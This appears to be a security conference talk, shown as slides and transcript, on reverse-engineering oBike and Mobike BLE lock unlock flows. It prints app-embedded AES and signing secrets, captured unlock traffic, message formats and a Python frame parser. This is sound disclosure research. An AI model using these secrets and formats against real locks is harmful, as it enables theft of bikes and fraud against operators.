Hacking BLE Bicycle Locks for Fun & A Small Profit
whoami
• From Sunny Singapore
• Senior Security Consultant @ MWR
• Mobile and Wireless geek
– BlackHat USA 2016 – Bad for Enterprise:
Attacking BYOD Enterprise Mobile Security Solutions
Overview
1. Bike-Sharing Economy and the BLE “Smart” Lock
2. Analyzing Communications
3. Building a Master Key
4. Demo
Major Players
Country China China Singapore
Founded 2014 2015 2017
Operations 20 Countries 16 Countries 22 Countries
Cost SGD$0.50/30min
Bluetooth Low Energy
Generic Access Profile (GAP)
• Peripheral
Small low powered device
e.g. bicycle lock
• Central
High powered computing device
e.g. Mobile Phone
Generic Attribute Profile (GATT)
• Services
Groups of Characteristics
16/128-bit UUID
• Characteristics
A single data point
16/128-bit UUID
Major Components
Personal BLE Bicycle Lock
Lock Decomposition
Figure labels: motor to release lock; logic controller / BLE; notch; spring mechanism; notch; pin
Noke Lock Services and Characteristics
Ubertooth One – Wireshark Capture
Major Components
iOS CoreBluetooth
CBPeripheral
• Remote peripheral devices that the app has discovered advertising or is currently connected to.
• -m "*[CBPeripheral readValue*]"
• -m "*[CBPeripheral writeValue*]"
• -m "*[CBPeripheral setNotifyValue*]"
CBPeripheralDelegate
• Provides methods called on events relating to discovery, exploration, and interaction with a remote peripheral.
• -m "*[* *didUpdateNotificationStateForCharacteristic*]"
• -m "*[* *didUpdateValueForCharacteristic*]"
Summary…
01. Scan QR Code
02. Get Lock Key From Server
03. Server Responds with Lock Key
04. Request Encrypted Token
05. Gets Encrypted Token
06. Decrypt Token & Unlock!
oBike
oBike Lock
oBike lock teardown and rebuild, dockless share bike rescue: https://youtu.be/Vl3Gl8w8n-Q
01. http://www.o.bike/download/app.html?m=065002064
02. App Checks Lock Status. Uploads Coordinates.
03. Server Responds with Lock Status
04. App Requests Key Source
05. App Gets Key Source
06. Request Unlock Key
07. Server Responds with Unlock Key
08. Unlock Bike Lock
HTTP Message Encryption
POST /api/v2/bike/060511449/lockNo HTTP/1.1
Host: mobile.o.bike
Content-Type: application/json
version: 3.2.4
Authorization: Bearer *****
{"value":"68693cfa10579681d81837350843342d9
9f0ba4373f9926c53c1f1c88576304d0b936e700388
8288fe949e73eb1d3267b713d2b261829ee04985234
23d6965db28e8b99854bf2adf592e51fb9da3b77068
f647b29caa5f22473ad01ec1011270a9d3a73100292
b0fdf331b17b37564556df790a58489d8cad3f4dd27
6d5ae68a95fc7effefc998de151eeb0983ddc721634
5e7682df8cf2de0d2cbf3a8b7e7c1c8f8604016c377
b0195b0ab9e83c604d"}
POST /api/v2/bike/unlockPass HTTP/1.1
Host: mobile.o.bike
Content-Type: application/json
version: 3.2.4
Authorization: Bearer *****
{"value":"aa47e49f01cc740fdaa87973966
799f94bf02ced7416b15f1cc7f63bf52f50f9
28e76c5d7f911a054188751f7243d68daef4b
69b22432ec2166dc823f29de811e21f4adbfd
b826748b9e2573912422b0a51f6a07a5c7be2
bf7d41b56d69945c3ecf3ec94444db5abb26b
8c771fe8eba91cb1a5d336cc2130bde9bcb25
350250bb92c5aa880b2e6c0b3c0004c11ab0f
14eb1182b78fb3dcb5eb68e61205ae5048"}
HTTP Message Encryption - AES
9386 ms | | +[OBikeEncrypt aesEncryptString:{"deviceId":"1521828969000-
8035385","dateTime":"1521984609867.631836","longitude":103.8331503422035,"latitude":1.38163138646
7611}&58bc93f4ac249b829174520a5afe733503f371f8]
9388 ms | | | +[OBikeEncrypt aesEncryptData:<7b226465 76696365 4964223a 22313532
31383238 39363930 30302d38 30333533 3835222c 22646174 6554696d 65223a22 31353231 39383436
30393836 372e3633 31383336 222c226c 6f6e6769 74756465 223a3130 332e3833 33313530 33343232
3033352c 226c6174 69747564 65223a31 2e333831 36333133 38363436 37363131 7d263538 62633933
66346163 32343962 38323931 37343532 30613561 66653733 33353033 66333731 6638> keyData:<6f42694f
534d5946 557a4c65 64333234>]
keyData:<6f42694f 534d5946 557a4c65 64333234> = oBiOSMYFUzLed324
AES Key: oBiOSMYFUzLed324
HTTP Message Encryption – SHA1Sum
POST /api/v2/bike/unlockPass HTTP/1.1
Host: mobile.o.bike
Content-Type: application/json
version: 3.2.4
{
"bikeId":"060511449",
"deviceId":"1521828969000-8035385",
"dateTime":"1521984617263.854980",
"keySource":"c4f1dc24"
}&ad6dad370f01782adfe200584ff63be31af29069
{
"bikeId":"060511449",
"deviceId":"1521828969000-8035385",
"dateTime":"1521984617263.854980",
"keySource":"c4f1dc24"
}&
oBiOSX4buhBMG 324
POST /api/v2/bike/060511449/lockNo HTTP/1.1
Host: mobile.o.bike
Content-Type: application/json
version: 3.2.4
{
"deviceId":"1521828969000-8035385",
"dateTime":"1521984609867.631836",
"longitude":103.8XXXXXXXX,
"latitude":1.3XXXXXXXX
}&58bc93f4ac249b829174520a5afe73
01. http://www.o.bike/download/app.html?m=065002064
02. App Checks Lock Status. Uploads Coordinates.
03. Server Responds with Lock Status
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 93
{"data":
{"lockNo":"639BADF22",
"lockType":2,
"faultBike":false},
"success":true,"errorCode":100}
16504 ms -[BluetoothManager peripheral:0x1742f6080 didDiscoverCharacteristicsForService:0x17667cb00
error:0x0]
16506 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:
<CBCharacteristic: 0x1704ae100, UUID = FFF6,
properties = 0x16, value = (null), notifying = NO>]
16515 ms | -[OBikeBluetoothManager BLEDidNotify]
16519 ms | | | | | | -[CBPeripheral writeValue:0x17483f980 forCharacteristic:0x1704ae100 type:0x1]
16519 ms | | | | | | writeValue -> _NSInlineData
16519 ms | | | | | | forCharacteristic -> CBCharacteristic
04. App Requests Key Source
16518 ms | | | | | +[BluetoothSendMessage sendRentBikeInstructionWithCBPeripheral:0x1742f6080
CBCharacteristic:0x1704ae100 Longti:0x0 Lat:0x0]
16519 ms | | | | | | +[BluetoothSendMessage setValueForRentBike:0x0 Lat:0x0]
16519 ms | | | | | | -[CBPeripheral writeValue:0x17483f980 forCharacteristic:0x1704ae100 type:0x1]
16519 ms | | | | | | writeValue -> _NSInlineData
16519 ms | | | | | | forCharacteristic -> CBCharacteristic
16774 ms -[BluetoothManager peripheral:0x1742f6080 didUpdateValueForCharacteristic:0x1704ae100 error:0x0]
16775 ms | | -[HandleBluetoothMessage checkBlueToothDataWith:0x170824b40]
16775 ms | | | +[BluetoothSendMessage GetBcc:0x170013ab0 size:0xc]
16781 ms | | -[OBikeBluetoothManager BLEGetBike:0x17045fec0]
16783 ms | | | +[OBikeEncrypt aesEncryptString:{"bikeId":"060511449","deviceId":"XXXXXXXXXX",
"dateTime":"1521984617263.854980","keySource":"c4f1dc24"}
&ad6dad370f01782adfe200584ff63be31af29069]
05. App Gets Key Source
POST /api/v2/bike/unlockPass HTTP/1.1
Host: mobile.o.bike
Content-Type: application/json
version: 3.2.4
{
"bikeId":"060511449",
"deviceId":"1521828969000-8035385",
"dateTime":"1521984617263.854980",
"keySource":"c4f1dc24"
}&ad6dad370f01782adfe200584ff63be31af29069
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 130
{"data":{
"encryptionKey":180,
"keys":"8be1be17d41e8fdff1ae1c82e4500fec",
"serverTime":1521984619298
},"success":true,"errorCode":100}
06. Request Unlock Key
07. Server Responds with Unlock Key
19106 ms -[OBikeBluetoothManager openLock:0xb000000000000b43 keys:0x1718648c0 serverTime:0xb0001625d5a43223]
19107 ms | | -[BluetoothManager openLock:0xa383430343937327 Time:0x170440690 Key:0x1718648c0 encryptionKey:0xb4]
19108 ms | | | | | +[BluetoothSendMessage setValueForUnlock:1521984619.298000 Index:0xb4
Phone:0xa383430343937327 Key:8be1be17d41e8fdff1ae1c82e4500fec]
19113 ms | | | | | | +[BluetoothSendMessage ToHex:0x5ab7a46b]
19114 ms | | | | | | +[BluetoothSendMessage dataFromHexString:0x174a48550]
19114 ms | | | | | | +[BluetoothSendMessage dataFromHexString:0x174a28da0]
19114 ms | | | | | | +[BluetoothSendMessage GetBcc:0x174a45fd0 size:0x19]
19117 ms | | | | | | +[BluetoothSendMessage GetBcc] retval: 0xff
19118 ms | | | | | -[CBPeripheral writeValue:0x174a54340 forCharacteristic:0x1704ae100 type:0x1]
19118 ms | | | | | writeValue -> NSConcreteMutableData
19118 ms | | | | | forCharacteristic -> CBCharacteristic
19127 ms | | | | | -[CBPeripheral writeValue:0x174a53ef0 forCharacteristic:0x1704ae100 type:0x1]
19127 ms | | | | | writeValue -> NSConcreteMutableData
19127 ms | | | | | forCharacteristic -> CBCharacteristic
08. Unlock Bike Lock
Unlock Algorithm
+[BluetoothSendMessage setValueForUnlock:1521984619.298000 Index:0xb4 Phone:0xa383430343937327 Key:8be1be17d41e8fdff1ae1c82e4500fec]
Message 1
???: 67 74
Message Length: 18
Command: 82
Key Index: b4
???: 00 00 02 79 40 48 00
Date Time: 6b a4 b7 5a
Message 2
AES Key (Truncated): 8b e1 be 17 d4 1e 8f df f1 ae 1c 82
BCC: ff
BCC Calculation (bytearr = Command … AES Key):
x = 0
for i in bytearr {
x ^= i
}
return x
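The field layout and the BCC rule above can be checked against the values captured on this page. This is an added example, not code from the talk or from the oBike app; it assumes Message 1 is the byte rows on the slide concatenated in the order shown, and the function names are hypothetical.

```python
import struct
from functools import reduce

# Bytes copied from the "Unlock Algorithm" slide. Assumption: Message 1 is the
# byte rows on the slide concatenated in the order they appear.
MESSAGE_1 = bytes.fromhex("67741882" "b400000279404800" "6ba4b75a")
MESSAGE_2 = bytes.fromhex("8be1be17d41e8fdff1ae1c82" "ff")

# Fields copied from the unlockPass response shown earlier on the page.
SERVER_RESPONSE = {
    "encryptionKey": 180,
    "keys": "8be1be17d41e8fdff1ae1c82e4500fec",
    "serverTime": 1521984619298,  # milliseconds
}


def bcc(data: bytes) -> int:
    """XOR of every byte, as in the slide's BCC calculation."""
    return reduce(lambda x, b: x ^ b, data, 0)


def parse_unlock(msg1: bytes, msg2: bytes) -> dict:
    """Split the two BLE writes into the fields named on the slide."""
    if len(msg1) != 16 or len(msg2) != 13:
        raise ValueError("unexpected write length")
    key, checksum = msg2[:12], msg2[12]
    # The slide says the BCC covers "Command ... AES Key": everything from the
    # command byte of Message 1 through the truncated key in Message 2.
    covered = msg1[3:] + key
    return {
        "prefix": msg1[0:2],            # "???" on the slide
        "length": msg1[2],              # "Message Length"
        "command": msg1[3],             # "Command"
        "key_index": msg1[4],           # "Key Index"
        "unknown": msg1[5:12],          # "???" on the slide
        "timestamp": struct.unpack_from("<I", msg1, 12)[0],  # little-endian seconds
        "key": key,                     # "AES Key (Truncated)"
        "bcc_sent": checksum,
        "bcc_computed": bcc(covered),
        "covered_len": len(covered),
    }


def cross_check(frame: dict, response: dict) -> list:
    """Return a list of mismatches between the BLE frame and the server response."""
    problems = []
    if frame["bcc_sent"] != frame["bcc_computed"]:
        problems.append("BCC mismatch")
    if frame["key_index"] != response["encryptionKey"]:
        problems.append("key index differs from encryptionKey")
    if frame["timestamp"] != response["serverTime"] // 1000:
        problems.append("timestamp differs from serverTime")
    if frame["key"].hex() != response["keys"][:24]:
        problems.append("key is not the first 12 bytes of keys")
    return problems


if __name__ == "__main__":
    frame = parse_unlock(MESSAGE_1, MESSAGE_2)
    for name, value in frame.items():
        shown = value.hex() if isinstance(value, bytes) else hex(value)
        print(f"{name:13} {shown}")
    print("mismatches:", cross_check(frame, SERVER_RESPONSE) or "none")
```

The 25 bytes covered by the checksum match the `size:0x19` argument in the `GetBcc` trace, and every variable field in the frame is taken directly from the server response.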
oBike Demo
MoBike
01. http://www.mobike.com/download/app.html?b=AXXXXXXX
02. App Checks Lock Status. Uploads Coordinates.
03. Server Responds with Lock Status
04. Server Responds with Unlock Key
05. Unlock Bike Lock
HTTP Message Integrity Check
POST /api/v2/rentmgr/unlockBike.do?sign=b9441790c2e3c42a57b439b51995f546 HTTP/1.1
Host: app.mobike.com
time: 1530100847000
mobileNo: +6512345678
accesstoken: XXXXXXXXXXXXXXXX
platform: 0
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 445
accesstoken=XXXXXXXXXXXXXXXX&bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&client_id=ios&epdata=Es7dCTkXiZ1IV3H6z%2BS9R%2BYzRjFby0T4ADUNKh0aXm6wfZzfJtQEQ5IC%2By5lZYGKFVy8I9vP6wwvkKCEqxNSMMCM3WespduyU8Svj7qyadFV4pN/nbC1behZa7ew3V0G8ofy6udhTkjbWLcjWeWvioJwrELB24aALccUKxCoMds%3D&latitude=1.3XXX&longitude=103.8XXX&mobileNo=+6512345678&time=1530100847000&timestamp=1530100847.123456&userid=XXXXXXXXX
HTTP Message Encryption
30714 ms | +[RSA encryptString:XXXXXXXXXXuseridXXXXXXX#1530031691.737942 publicKey:MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCi/VezJp6KaJNXZCHpQ4YmKxlWrcrddow5pHDX3vHeiUqdOoJZJoBpUvFuFdlWEqP7itWNcPnuYAqRwXkh6xWD1oM4MrK4eH8/AzdGIgrcgq+pbB3DymgEujkHBhrxXqFiUS2OjfebKwU0xJTPQM/KcxjqGDZxzswOxFJDxyKcwIDAQAB]
enter mbk_lowercaseMd5 ->
accesstoken=XXXXXXXXXX&bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&client_id=ios&epdata=Es7dCTkXiZ1IV3H6z+S9R+YzRjFby0T4ADUNKh0aXm6wfZzfJtQEQ5IC+y5lZYGKFVy8I9vP6wwvkKCEqxNSMMCM3WespduyU8Svj7qyadFV4pN/nbC1behZa7ew3V0G8ofy6udhTkjbWLcjWeWvioJwrELB24aALccUKxCoMds=&latitude=1.381585998461937&longitude=103.8330852148159&mobileNo=+65XXXXXXXX&time=1530031691000&timestamp=1530031691.737942&userid=XXXXXXXXX@iossecret
leave mbk_lowercaseMd5 -> b9441790c2e3c42a57b439b51995f546
01. http://www.o.bike/download/app.html?m=065002064
02. App Checks Lock Status. Uploads Coordinates.
POST /api/v2/rentmgr/unlockBike.do?sign=9623f419340536f95c314d81c4c2b548 HTTP/1.1
bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&client_id=ios&epdata=ML1G%2BNjHnhzQPMoRZwtBx5k3c0yOBpBFZKePvb3WsR0%2BWBvtT7saxcwIwbI6JAkG27HGjWKMGjeCwUyvw1zOgOA17Lybmbv30ltfBwUkeFmpgklpG2YMEgFEEdCjYxhskfMtoLKWCz3WFBriiZ5S6yHnH5aT1yKe/YB7mMo1f0U%3D&latitude=1.3XXX&longitude=103.8XXXX&timestamp=1530096030.920647&userid=XXXXX
03. Server Responds with Lock Status
Faulty
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Connection: close
{
"bikeHardwareType": 2,
"bikeId": "AXXXXXXX",
...
"message": "Our apologies, this bike needs maintenance, please use another one",
...
}
Good
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Connection: close
{
"bikeHardwareType": 2,
"bikeId": "AXXXXXXX",
...
"object": {
"authkey": "",
"data": "001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201",
"orderid": "MBKA0000XXXXXXXX",
...
04. Server Responds with Unlock Key
05. Unlock Bike Lock
32484 ms -[MBKUnlockBikeData setData:001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201]
35446 ms -[MBKPeripheral peripheral:<CBPeripheral: 0x1744ee380, identifier = 2B7D32FB-8B34-4C58-BB57-
A37976F63FC3, name = mobike, state = connected> didDiscoverCharacteristicsForService:<CBService:
0x172679c80, isPrimary = YES, UUID = A000FAA0-0047-005A-0052-6D6F62696B65> error:0x0]
35449 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:<CBCharacteristic: 0x174aa45c0, UUID
= A000FEE1-0047-005A-0052-6D6F62696B65, properties = 0x10, value = <31>, notifying = NO>]
35452 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:<CBCharacteristic: 0x174aa46e0, UUID
= A000FEE0-0047-005A-0052-6D6F62696B65, properties = 0x8, value = <33324634 46454444 37363546 38453530
46324232>, notifying = NO>]
05. Unlock Bike Lock
35591 ms | -[MBKPeripheral writeString:30001BB441CB88B40345]
35592 ms | | -[CBPeripheral writeValue:0x17525e1b0 forCharacteristic:0x174aa46e0 type:0x0]
35592 ms | | writeValue -> _NSInlineData
35592 ms | | forCharacteristic -> CBCharacteristic
05. Unlock Bike Lock
35666 ms | -[MBKPeripheral writeString:3165E1C7BE448CD4B3D9]
35667 ms | | -[CBPeripheral writeValue:0x17145c410 forCharacteristic:0x174aa46e0 type:0x0]
35667 ms | | writeValue -> _NSInlineData
35667 ms | | forCharacteristic -> CBCharacteristic
05. Unlock Bike Lock
35739 ms | -[MBKPeripheral writeString:32F5CAA8452A23235201]
35741 ms | | -[CBPeripheral writeValue:0x17125e720 forCharacteristic:0x174aa46e0 type:0x0]
35741 ms | | writeValue -> _NSInlineData
35741 ms | | forCharacteristic -> CBCharacteristic
Unlock Algorithm
32484 ms -[MBKUnlockBikeData setData:001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201]
Message 1
Index ?: 30
Message: 001BB441CB88B40345
Message 2
Index ?: 31
Message: 65E1C7BE448CD4B3D9
Message 3
Index ?: 32
Message: F5CAA8452A23235201
MoBike Demo
Repeatable Process
1. Enumerate Services and Characteristics
2. Capture Characteristics Settings
-m "*[CBPeripheral setNotifyValue*]"
3. Capture BLE Reads & BLE Writes
-m "*[CBPeripheral readValue*]"
-m "*[CBPeripheral writeValue*]"
Thank you for listening!
Q&A

Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptxGenerative AI - Gitex v1Generative AI - Gitex v1.pptx
Generative AI - Gitex v1Generative AI - Gitex v1.pptx
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 

Hacking BLE Bicycle Locks for Fun and a Small Profit

  • 1. Hacking BLE Bicycle Locks for Fun & A Small Profit
  • 3. whoami
      • From Sunny Singapore
      • Senior Security Consultant @ MWR
      • Mobile and Wireless geek
        – BlackHat USA 2016 – Bad for Enterprise: Attacking BYOD Enterprise Mobile Security Solutions
  • 4. Overview
      1. Bike-Sharing Economy and the BLE “Smart” Lock
      2. Analyzing Communications
      3. Building a Master Key
      4. Demo
  • 7. Major Players
      Country:    China | China | Singapore
      Founded:    2014 | 2015 | 2017
      Operations: 20 Countries | 16 Countries | 22 Countries
      Cost:       SGD$0.50/30min
  • 8. Bluetooth Low Energy: Generic Access Profile (GAP)
      • Peripheral: small low-powered device, e.g. bicycle lock
      • Central: high-powered computing device, e.g. mobile phone
  • 9. Bluetooth Low Energy: Generic Attribute Profile (GATT)
      • Services: groups of Characteristics, 16/128-bit UUID
      • Characteristics: a single data point, 16/128-bit UUID
  • 16. Noke Lock Services and Characteristics
  • 18. Ubertooth One – Wireshark Capture
  • 21. iOS CoreBluetooth
      CBPeripheral
      • Remote peripheral devices that the app has discovered advertising or is currently connected to.
      • -m "*[CBPeripheral readValue*]"
      • -m "*[CBPeripheral writeValue*]"
      • -m "*[CBPeripheral setNotifyValue*]"
      CBPeripheralDelegate
      • Provides methods called on events relating to discovery, exploration, and interaction with a remote peripheral.
      • -m "*[* *didUpdateNotificationStateForCharacteristic*]"
      • -m "*[* *didUpdateValueForCharacteristic*]"
  • 22. Summary…
      01 Scan QR Code
      02 Get Lock Key From Server
      03 Server Responds with Lock Key
      04 Request Encrypted Token
      05 Gets Encrypted Token
      06 Decrypt Token & Unlock!
  • 24. oBike Lock oBike lock teardown and rebuild, dockless share bike rescue: https://youtu.be/Vl3Gl8w8n-Q
  • 26. oBike unlock flow
      01 http://www.o.bike/download/app.html?m=065002064
      02 App Checks Lock Status. Uploads Coordinates.
      03 Server Responds with Lock Status
      04 App Requests Key Source
      05 App Gets Key Source
      06 Request Unlock Key
      07 Server Responds with Unlock Key
      08 Unlock Bike Lock
  • 27. HTTP Message Encryption
      POST /api/v2/bike/060511449/lockNo HTTP/1.1
      Host: mobile.o.bike
      Content-Type: application/json
      version: 3.2.4
      Authorization: Bearer *****

      {"value":"68693cfa10579681d81837350843342d99f0ba4373f9926c53c1f1c88576304d0b936e7003888288fe949e73eb1d3267b713d2b261829ee0498523423d6965db28e8b99854bf2adf592e51fb9da3b77068f647b29caa5f22473ad01ec1011270a9d3a73100292b0fdf331b17b37564556df790a58489d8cad3f4dd276d5ae68a95fc7effefc998de151eeb0983ddc7216345e7682df8cf2de0d2cbf3a8b7e7c1c8f8604016c377b0195b0ab9e83c604d"}

      POST /api/v2/bike/unlockPass HTTP/1.1
      Host: mobile.o.bike
      Content-Type: application/json
      version: 3.2.4
      Authorization: Bearer *****

      {"value":"aa47e49f01cc740fdaa87973966799f94bf02ced7416b15f1cc7f63bf52f50f928e76c5d7f911a054188751f7243d68daef4b69b22432ec2166dc823f29de811e21f4adbfdb826748b9e2573912422b0a51f6a07a5c7be2bf7d41b56d69945c3ecf3ec94444db5abb26b8c771fe8eba91cb1a5d336cc2130bde9bcb25350250bb92c5aa880b2e6c0b3c0004c11ab0f14eb1182b78fb3dcb5eb68e61205ae5048"}
  • 28. HTTP Message Encryption - AES
      9386 ms | | +[OBikeEncrypt aesEncryptString:{"deviceId":"1521828969000-8035385","dateTime":"1521984609867.631836","longitude":103.8331503422035,"latitude":1.381631386467611}&58bc93f4ac249b829174520a5afe733503f371f8]
      9388 ms | | | +[OBikeEncrypt aesEncryptData:<7b226465 76696365 4964223a 22313532 31383238 39363930 30302d38 30333533 3835222c 22646174 6554696d 65223a22 31353231 39383436 30393836 372e3633 31383336 222c226c 6f6e6769 74756465 223a3130 332e3833 33313530 33343232 3033352c 226c6174 69747564 65223a31 2e333831 36333133 38363436 37363131 7d263538 62633933 66346163 32343962 38323931 37343532 30613561 66653733 33353033 66333731 6638> keyData:<6f42694f 534d5946 557a4c65 64333234>]
      keyData:<6f42694f 534d5946 557a4c65 64333234> = oBiOSMYFUzLed324
      AES Key: oBiOSMYFUzLed324
  • 29. HTTP Message Encryption – SHA1Sum
      POST /api/v2/bike/unlockPass HTTP/1.1
      Host: mobile.o.bike
      Content-Type: application/json
      version: 3.2.4

      { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }&ad6dad370f01782adfe200584ff63be31af29069

      { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }&
      oBiOSX4buhBMG324
  • 30. 01 http://www.o.bike/download/app.html?m=065002064
      02 App Checks Lock Status. Uploads Coordinates.
      POST /api/v2/bike/060511449/lockNo HTTP/1.1
      Host: mobile.o.bike
      Content-Type: application/json
      version: 3.2.4

      { "deviceId":"1521828969000-8035385", "dateTime":"1521984609867.631836", "longitude":103.8XXXXXXXX, "latitude":1.3XXXXXXXX }&58bc93f4ac249b829174520a5afe73
  • 31. 03 Server Responds with Lock Status
      HTTP/1.1 200
      Content-Type: application/json;charset=UTF-8
      Connection: close
      Vary: Accept-Encoding
      Content-Length: 93

      {"data": {"lockNo":"639BADF22", "lockType":2, "faultBike":false}, "success":true,"errorCode":100}
  • 32. 04 App Requests Key Source
      16504 ms -[BluetoothManager peripheral:0x1742f6080 didDiscoverCharacteristicsForService:0x17667cb00 error:0x0]
      16506 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic: <CBCharacteristic: 0x1704ae100, UUID = FFF6, properties = 0x16, value = (null), notifying = NO>]
      16515 ms | -[OBikeBluetoothManager BLEDidNotify]
      16519 ms | | | | | | -[CBPeripheral writeValue:0x17483f980 forCharacteristic:0x1704ae100 type:0x1]
      16519 ms | | | | | | writeValue -> _NSInlineData
      16519 ms | | | | | | forCharacteristic -> CBCharacteristic
  • 33. 05 App Gets Key Source
      16518 ms | | | | | +[BluetoothSendMessage sendRentBikeInstructionWithCBPeripheral:0x1742f6080 CBCharacteristic:0x1704ae100 Longti:0x0 Lat:0x0]
      16519 ms | | | | | | +[BluetoothSendMessage setValueForRentBike:0x0 Lat:0x0]
      16519 ms | | | | | | -[CBPeripheral writeValue:0x17483f980 forCharacteristic:0x1704ae100 type:0x1]
      16519 ms | | | | | | writeValue -> _NSInlineData
      16519 ms | | | | | | forCharacteristic -> CBCharacteristic
      16774 ms -[BluetoothManager peripheral:0x1742f6080 didUpdateValueForCharacteristic:0x1704ae100 error:0x0]
      16775 ms | | -[HandleBluetoothMessage checkBlueToothDataWith:0x170824b40]
      16775 ms | | | +[BluetoothSendMessage GetBcc:0x170013ab0 size:0xc]
      16781 ms | | -[OBikeBluetoothManager BLEGetBike:0x17045fec0]
      16783 ms | | | +[OBikeEncrypt aesEncryptString:{"bikeId":"060511449","deviceId":"XXXXXXXXXX", "dateTime":"1521984617263.854980","keySource":"c4f1dc24"} &ad6dad370f01782adfe200584ff63be31af29069]
  • 34. 06 Request Unlock Key
      POST /api/v2/bike/unlockPass HTTP/1.1
      Host: mobile.o.bike
      Content-Type: application/json
      version: 3.2.4

      { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }&ad6dad370f01782adfe200584ff63be31af29069

      07 Server Responds with Unlock Key
      HTTP/1.1 200
      Content-Type: application/json;charset=UTF-8
      Connection: close
      Vary: Accept-Encoding
      Content-Length: 130

      {"data":{ "encryptionKey":180, "keys":"8be1be17d41e8fdff1ae1c82e4500fec", "serverTime":1521984619298 },"success":true,"errorCode":100}
  • 35. 08 Unlock Bike Lock
      19106 ms -[OBikeBluetoothManager openLock:0xb000000000000b43 keys:0x1718648c0 serverTime:0xb0001625d5a43223]
      19107 ms | | -[BluetoothManager openLock:0xa383430343937327 Time:0x170440690 Key:0x1718648c0 encryptionKey:0xb4]
      19108 ms | | | | | +[BluetoothSendMessage setValueForUnlock:1521984619.298000 Index:0xb4 Phone:0xa383430343937327 Key:8be1be17d41e8fdff1ae1c82e4500fec]
      19113 ms | | | | | | +[BluetoothSendMessage ToHex:0x5ab7a46b]
      19114 ms | | | | | | +[BluetoothSendMessage dataFromHexString:0x174a48550]
      19114 ms | | | | | | +[BluetoothSendMessage dataFromHexString:0x174a28da0]
      19114 ms | | | | | | +[BluetoothSendMessage GetBcc:0x174a45fd0 size:0x19]
      19117 ms | | | | | | +[BluetoothSendMessage GetBcc] retval: 0xff
      19118 ms | | | | | -[CBPeripheral writeValue:0x174a54340 forCharacteristic:0x1704ae100 type:0x1]
      19118 ms | | | | | writeValue -> NSConcreteMutableData
      19118 ms | | | | | forCharacteristic -> CBCharacteristic
      19127 ms | | | | | -[CBPeripheral writeValue:0x174a53ef0 forCharacteristic:0x1704ae100 type:0x1]
      19127 ms | | | | | writeValue -> NSConcreteMutableData
      19127 ms | | | | | forCharacteristic -> CBCharacteristic
  • 36. Unlock Algorithm
      Message 1
        ??? / Message Length / Command:  67 74 18 82
